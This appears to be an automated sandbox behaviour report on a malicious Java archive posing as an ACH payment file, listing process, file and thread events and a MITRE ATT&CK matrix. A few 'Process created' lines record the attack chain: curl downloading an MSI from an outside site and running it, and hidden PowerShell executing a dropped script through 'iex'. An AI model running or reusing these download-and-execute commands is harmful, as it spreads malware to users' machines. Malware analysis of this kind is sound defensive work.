Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5388Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4460Jump to behavior
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 375Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2876Thread sleep time: -12912720851596678s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: java.exe, 00000002.00000002.1427597441.000000000068B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlljK!
Source: java.exe, 00000002.00000003.1264158753.0000000014759000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: java.exe, 00000002.00000003.1264158753.0000000014759000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: java.exe, 00000002.00000002.1427597441.000000000068B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Ljava/lang/VirtualMachineError;
Source: java.exe, 00000002.00000003.1264158753.0000000014759000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: java.exe, 00000002.00000002.1427597441.000000000068B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cjava/lang/VirtualMachineError
Source: PING.EXE, 0000001F.00000002.1640568380.000001D62D459000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll::vZP
Source: java.exe, 00000002.00000003.1264158753.0000000014759000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: java/lang/VirtualMachineError.classPK
Source: PING.EXE, 00000031.00000002.2146890902.0000026CC4E99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll::^MP
Source: curl.exe, 0000000B.00000003.1286525606.0000000002C80000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 0000001C.00000002.1529112402.000001BED1657000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 0000001D.00000002.1565163415.000001279D1D7000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 0000001E.00000002.1605666574.00000268EED09000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000023.00000002.1775006042.000002107DCC8000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 0000002E.00000002.2044354856.0000022443B48000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 0000002F.00000002.2078440727.0000012922477000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000030.00000002.2114639207.00000226958F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: PING.EXE, 00000019.00000002.1497042027.0000016ED4A69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllbb
Source: PING.EXE, 00000020.00000002.1672705320.000001B43FE89000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 0000002C.00000002.1976924103.000002951E7C9000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 0000002D.00000002.2008985014.00000229135A9000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000032.00000002.2181752430.000002111F269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll::
Source: PING.EXE, 00000021.00000002.1707700148.00000272D2D27000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000022.00000002.1740041592.0000020C097F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII
Source: PING.EXE, 00000025.00000002.1807475146.000001F4A84E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJJ
Source: PING.EXE, 00000026.00000002.1842548242.0000019B6E4B9000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000028.00000002.1909390737.000002D622F09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{{
Source: PING.EXE, 00000027.00000002.1874683368.000001475CEC7000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 0000002B.00000002.1942023468.0000016F6D327000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000033.00000002.2213978057.00000249D0F47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllWW
Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start /min C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)"Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeMemory protected: page read and write | page guardJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\23-April-24-ACH-7fa67756.jar" Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)MJump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c curl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiJump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c C:\downloads\aHPCrYM1.msiJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\downloads\aHPCrYM1.msi" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 2_2_021B03C0 cpuid 2_2_021B03C0
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\6152 VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\charsets.jar VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Replication Through Removable Media		1
Exploitation for Client Execution		1
Services File Permissions Weakness		11
Process Injection		11
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		1
DLL Side-Loading		1
Services File Permissions Weakness		11
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		21
Virtualization/Sandbox Evasion		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets11
Peripheral Device Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
